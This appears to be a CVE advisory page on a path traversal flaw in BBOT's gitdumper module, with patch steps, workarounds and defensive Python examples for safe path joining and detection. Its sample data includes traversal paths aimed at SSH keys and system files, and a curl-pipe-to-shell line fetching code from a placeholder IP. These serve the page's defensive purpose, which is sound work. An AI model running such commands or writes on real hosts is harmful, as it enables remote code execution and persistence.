CVE-2025-10283
📋 TL;DR
CVE-2025-10283 is a path traversal vulnerability in BBOT's gitdumper module, the module that downloads exposed .git directories from web servers found during a scan. A malicious repository served by a scanned host can make the module write files outside its intended output directory, and that out-of-tree write can be leveraged for arbitrary code execution on the host running BBOT. Note the direction of the attack: the scanned target compromises the scanner, so the people at risk are security professionals and organizations running BBOT for reconnaissance.
💻 Affected Systems
- BBOT (Black Lantern Offensive Toolkit)
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with attacker gaining complete control over the BBOT host, enabling lateral movement, data exfiltration, and persistent access.
Likely Case
Remote code execution leading to reconnaissance tool compromise, credential theft, and potential pivot to internal networks.
If Mitigated
Limited impact with proper network segmentation and restricted execution environments, potentially only affecting the BBOT instance.
🎯 Exploit Status
Exploitation requires BBOT to process a malicious git repository with the gitdumper module enabled. Because gitdumper fetches .git directories from web servers that the scan itself discovers, no user interaction beyond launching the scan is needed: any in-scope host (or anyone who can place content on one) can serve the crafted repository. No public exploit is recorded on this page.
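The core of a traversal bug in any .git dumper is that file paths reconstructed from the remote repository (index entries, ref names, object paths) are joined onto the output directory without checking where the result lands. The following is an added illustration of that vulnerable pattern next to a hardened join; it is not BBOT's code, and the sample entries, the `OUTPUT_DIR` path and the `naive_join`/`safe_join` names are assumptions made for the example.

```python
"""Illustrative path-traversal check for a .git-directory dumper (added example, not BBOT's code)."""
import os
import posixpath
from typing import Dict, Optional, Tuple

# Assumed output directory for the demo; it is never created, the checks are purely on paths.
OUTPUT_DIR = "/tmp/bbot-demo-out"

# Constructed sample: paths a dumper might reconstruct from a fetched .git directory.
# The hostile entries are invented for illustration, not taken from any real repository.
SAMPLE_ENTRIES = [
    "src/app.py",                        # ordinary tracked file
    "refs/heads/main",                   # ordinary ref
    "../../.ssh/authorized_keys",        # classic dot-dot escape
    "hooks/../../../etc/cron.d/job",     # escape hidden behind a plausible prefix
    "/etc/passwd",                       # absolute path, join() discards the base entirely
    "docs/..\\..\\x",                    # backslash variant: inert on POSIX, an escape on Windows
    "a/./b//c",                          # odd but in-bounds
]


def naive_join(output_dir: str, entry: str) -> str:
    """The vulnerable pattern: trust the remote path and join it onto the output directory."""
    return os.path.normpath(os.path.join(output_dir, entry))


def safe_join(output_dir: str, entry: str) -> Optional[str]:
    """Hardened join: reject absolute paths and '..' components up front, then confirm
    the fully resolved result still lies under output_dir. Returns None if the entry
    must be dropped."""
    if not entry or "\x00" in entry:
        return None
    normalized = entry.replace("\\", "/")          # treat backslashes as separators too
    if posixpath.isabs(normalized):
        return None
    if any(part == ".." for part in normalized.split("/")):
        return None
    base = os.path.realpath(output_dir)
    candidate = os.path.realpath(os.path.join(base, normalized))
    # realpath follows symlinks, so a symlink already inside output_dir that points
    # outside it is caught here as well.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def escapes(output_dir: str, entry: str) -> bool:
    """True if the naive join would write outside output_dir (POSIX semantics)."""
    base = os.path.abspath(output_dir)
    target = naive_join(base, entry)
    return os.path.commonpath([base, target]) != base


def triage(entries, output_dir: str = OUTPUT_DIR) -> Dict[str, Tuple[bool, bool]]:
    """For each entry: (naive join escapes?, safe join accepts?)."""
    return {e: (escapes(output_dir, e), safe_join(output_dir, e) is not None) for e in entries}


if __name__ == "__main__":
    for entry, (bad, accepted) in triage(SAMPLE_ENTRIES).items():
        print(f"{entry!r:40} naive_escapes={bad!s:5} safe_join_accepts={accepted}")
```

The `docs/..\\..\\x` entry is the case worth remembering: the naive join is harmless on a Linux scanner, yet the hardened join still rejects it, because a rule that depends on the host's separator semantics is one port away from becoming a bug.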
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: the release named in the vendor advisory (the CVE entry on this page records no version range)
Vendor Advisory: https://blog.blacklanternsecurity.com/p/bbot-security-advisory-gitdumper
Restart Required: No service restart, but any scan already running keeps the old module code until it is relaunched
Instructions:
1. Update BBOT to the latest release: pip install --upgrade bbot (or pipx upgrade bbot if it was installed with pipx)
2. Confirm the installed version with bbot --version and check that it is at or above the fixed release named in the vendor advisory
3. Review any custom presets or configurations that enable gitdumper, and re-run them only on the patched version
🔧 Temporary Workarounds
Disable gitdumper module
Temporarily exclude the vulnerable module so a scan cannot load it, even if a flag or preset would otherwise pull it in
bbot -t <target> -em gitdumper
(In a preset file the equivalent is an exclude_modules: [gitdumper] entry.)
Restrict git repository sources
Only run gitdumper against targets you control or trust. The module fetches .git directories from web servers discovered during the scan, so any in-scope host can supply the malicious repository.
🧯 If You Can't Patch
- Isolate BBOT hosts in a segment whose egress is limited to the targets under assessment, and keep no credentials, VPN profiles or routes to internal networks on them
- Run BBOT in a container with minimal privileges and a read-only root filesystem, mounting only the scan output directory as writable
🔍 How to Verify
Check if Vulnerable:
You are exposed if the installed BBOT predates the fixed release named in the vendor advisory and gitdumper is selected, either explicitly (-m gitdumper) or through a flag or preset that includes it
Check Version:
bbot --version
Verify Fix Applied:
Confirm bbot --version reports the fixed release, then run gitdumper against a repository you control and check that every file it writes lands under the scan's output directory
📡 Detection & Monitoring
Log Indicators:
- gitdumper output written outside the scan's output directory (by default under ~/.bbot/scans)
- Child processes of bbot that are not the tools a scan is expected to launch (for a gitdumper scan, git), in particular shells or interpreters
- Fetched .git paths containing ../ or absolute components, if your telemetry records the dumped file names
Network Indicators:
- gitdumper fetching .git directories from hosts outside the intended scan scope
- Unexpected outbound connections from BBOT hosts to destinations that are neither scan targets nor BBOT's own dependencies
SIEM Query (baselines normal gitdumper and git_clone usage; pair it with the file-write and child-process indicators above, since the query alone also matches legitimate scans):
process_name:"bbot" AND (command_line:"gitdumper" OR command_line:"git clone")
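The query above only tells you that gitdumper ran; the indicators worth alerting on are bbot writing outside its output directory and bbot spawning something other than git. The following is an added example, not BBOT's or any SIEM vendor's code, that applies those two rules to process and file-write events. The event format, the `/home/rec/.bbot/scans` output root and the `git`-only child allowlist are assumptions for the example; map them onto your own EDR or auditd fields.

```python
"""Illustrative host-side detection for a compromised BBOT scanner (added example, not BBOT's code)."""
import os
from typing import Dict, List, Set

# Assumptions for the demo: BBOT's default output root for this user, and the only child
# process a gitdumper scan is expected to launch. Extend the set for scans that run nmap etc.
BBOT_OUTPUT_ROOTS = ["/home/rec/.bbot/scans"]
EXPECTED_CHILDREN: Set[str] = {"git"}

# Constructed sample events in a simplified, hypothetical EDR-style schema.
SAMPLE_EVENTS: List[Dict] = [
    {"type": "process", "pid": 100, "ppid": 1,
     "exe": "/home/rec/.local/bin/bbot", "cmd": "bbot -t example.com -m gitdumper"},
    {"type": "file_write", "pid": 100,
     "path": "/home/rec/.bbot/scans/demo_scan/gitdumper/example.com/.git/index"},
    {"type": "file_write", "pid": 100,
     "path": "/home/rec/.ssh/authorized_keys"},           # write outside the output root
    {"type": "process", "pid": 101, "ppid": 100,
     "exe": "/usr/bin/git", "cmd": "git checkout ."},    # expected child
    {"type": "process", "pid": 102, "ppid": 100,
     "exe": "/bin/sh", "cmd": "sh -c 'curl http://203.0.113.5/x | sh'"},  # unexpected child
]


def is_bbot_process(evt: Dict) -> bool:
    return evt["type"] == "process" and os.path.basename(evt["exe"]) == "bbot"


def under(path: str, roots: List[str]) -> bool:
    """True if path lies under any of the given root directories (lexical check)."""
    p = os.path.normpath(path)
    for root in roots:
        r = os.path.normpath(root)
        if os.path.commonpath([r, p]) == r:
            return True
    return False


def detect(events: List[Dict],
           output_roots: List[str] = BBOT_OUTPUT_ROOTS,
           expected_children: Set[str] = EXPECTED_CHILDREN) -> List[Dict]:
    """Return alerts for bbot writing outside its output roots or spawning unexpected children."""
    bbot_pids = {e["pid"] for e in events if is_bbot_process(e)}
    alerts = []
    for e in events:
        if e["type"] == "process" and e["ppid"] in bbot_pids \
                and os.path.basename(e["exe"]) not in expected_children:
            alerts.append({"rule": "unexpected_child", "pid": e["pid"], "detail": e["cmd"]})
        elif e["type"] == "file_write" and e["pid"] in bbot_pids \
                and not under(e["path"], output_roots):
            alerts.append({"rule": "write_outside_output", "pid": e["pid"], "detail": e["path"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Both rules are cheap enough to run continuously on a dedicated scanning host, and neither depends on knowing the exploit: a file write into ~/.ssh or /etc from a recon tool is wrong whatever CVE caused it.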